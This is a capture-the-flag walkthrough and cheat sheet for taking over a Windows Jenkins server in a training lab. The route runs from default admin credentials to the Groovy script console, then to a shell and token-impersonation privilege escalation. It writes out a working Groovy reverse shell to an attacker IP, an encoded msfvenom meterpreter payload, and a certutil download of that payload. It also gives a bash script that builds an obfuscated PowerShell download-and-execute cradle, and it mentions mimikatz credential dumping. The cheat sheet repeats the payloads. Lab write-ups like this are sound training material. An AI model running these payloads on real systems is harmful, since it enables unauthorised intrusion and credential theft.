Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

Metadata

Tasks

Task 1 - Initial Access

If you've read my write-ups before you know I like to scan in at least two stages - an initial scan and a narrow scan.

Initial scan:

sudo nmap -p- -v 

Add -Pn if windows machine

Narrow secondary scan:

sudo nmap -v -A -sC --script vuln -p PORTS

The narrow scan found a robots.txt file for the 8080 port - but it is useless.

We begin to look at the two web servers on port 80 and 8080.

Port 80:

Not super interesting - maybe the email could be used later...

Port 8080:

This is however interesting... if we find out the login we will have access to the Jenkins panel!

We can start by googling the default credentials for Jenkins:

From this a good way to start is by trying 'admin' as the username - however the login panel doesn't seem to generate a new response if you only have the correct username (assuming admin is the username).

In my case I just tried a handful of passwords before finding the right one admin:admin - however if you struggle you can default to Hydra or Burp Intruder (or similar tool).

Now we want to find a way to execute stuff on the server. The logical place to find this is under 'Manage Jenkins', and there we go!

This is looking real promising! A simple google search later leads me to this article with a plethora of ways to abuse this functionality. I went for a simple reverse shell to the server:

String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

To catch the shell in metasploit I used:

msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4444;run'

Now all you have to do is press run!

Unfortunately we cannot instantly upgrade the shell to a meterpreter and have to do it the manual way of generating a payload and upload it to the server.

Generate payload:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe

Download the payload (certutil is installed on default):

certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe

Start a handler:

msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4443;set payload windows/x64/meterpreter/reverse_tcp;run'

And execute the payload .\meterpreter.exe!

#!/bin/bash
# meterpreter ip & port
lhost=10.14.46.99
lport=4444
echo " * Writing Payload"
cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Command"
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')"
echo $scriptblock
echo
echo " * Encoding command"
encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"
echo $encode
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo
echo " * Final command"
echo $command
echo 
echo " * Groovy command "
echo " def process=\"$command\".execute();"
echo " println(\"\${process.text}\"); "
echo
echo " * Starting HTTP Server to serve payload"
python3 -m http.server

Now with a meterpreter shell, we can just read the user flag:

Task 2 - Switching Shells

I accidentally did this in the last task with the same payload - so I just entered the final size and jumped to the next task.

Task 3 - Privilege Escalation

Windows uses token-based permissions and applied (usually by lsass.exe) when users log in/authenticate.

This access token consists of:

Two types of access tokens:

Here are the most commonly abused privileges:

There's more reading here. To list privileges: whoami /priv

We begin listing our privileges:

Comparing to what we have just learned - two common exploited privileges are:

If both of these are enabled we can [load/use] incognito in the meterpreter and use any impersonation token:

Meterpreter modules

To list all modules you can load, simply type load and then press tab twice. After you've loaded a modules, you will find all the commands at the bottom of the help command.

Even though we are impersonated as `NT AUTHORITY\SYSTEM` we may still not have elevated privileges due to how windows can use the primary access token. To make sure we have the correct privilege we can migrate process: `migrate -N services.exe`. Now if successful - we can access the root folder and read the final flag:

BONUS:

Get all the credentials on the system, we can load the kiwi (mimikatz) module:

Now we can compare the hashdump (no module required) vs the mimikatz outputs:

Cheat Sheet

Nmap

Initial port scan:

sudo nmap -p- -v 

Add -Pn if windows machine

Narrow secondary scan:

sudo nmap -v -A -sC --script vuln -p PORTS

Payloads

Msfvenom: Reverse meterpreter shell:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe

Groovy:

String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/

 #!/bin/bash
 
 # meterpreter ip & port
 lhost=10.14.46.99
 lport=4444
 
 echo " * Writing Payload"
 cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
 echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
 
 echo " * Prepping Command"
 scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')"
 echo $scriptblock
 
 echo
 echo " * Encoding command"
 encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"
 echo $encode
 
 command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
 echo
 echo " * Final command"
 echo $command
 
 echo 
 echo " * Groovy command "
 echo " def process=\"$command\".execute();"
 echo " println(\"\${process.text}\"); "
 
 echo
 echo " * Starting HTTP Server to serve payload"
 python3 -m http.server

Living of the Land (LOL/LotL)

Download file:

certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe

Host webserver

python -m http.server [--bind 0.0.0.0 <port>]

Privileges in Windows

Windows uses token-based permissions and applied (usually by lsass.exe) when users log in/authenticate.

This access token consists of:

• User SIDs (security identifier)
• Group SIDs
• Privileges
• And more...

Two types of access tokens:

• Primary access tokens: those associated with a user account that are generated on log on
• Impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process. Think similar to how SUID-bits work in Linux. Levels of impersonation token:
  • SecurityAnonymous: current user/client cannot impersonate another user/client
  • SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
  • SecurityImpersonation: current user/client can impersonate the client's security context on the local system
  • SecurityDelegation: current user/client can impersonate the client's security context on a remote system

Distinguish impersonated token to primary

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).

Here are the most commonly abused privileges:

• SeImpersonatePrivilege
• SeAssignPrimaryPrivilege
• SeTcbPrivilege
• SeBackupPrivilege
• SeRestorePrivilege
• SeCreateTokenPrivilege
• SeLoadDriverPrivilege
• SeTakeOwnershipPrivilege
• SeDebugPrivilege

There's more reading here. To list privileges: whoami /priv

Meterpreter

Modules:

[load/use] <module-name>

Meterpreter modules

To list all modules you can load, simply type load and then press tab twice. After you've loaded a modules, you will find all the commands at the bottom of the help command.

Migrate service:

migrate <PID>
migrate -N <process-name>

Support me

Thank you so much for reading and I hope you found it inspirational or helpful! You can best support me by doing any of the following bellow!

You can read more about the perks of being a Member or Subscriber here.

Additionally, you can stay updated and engage with me on social media: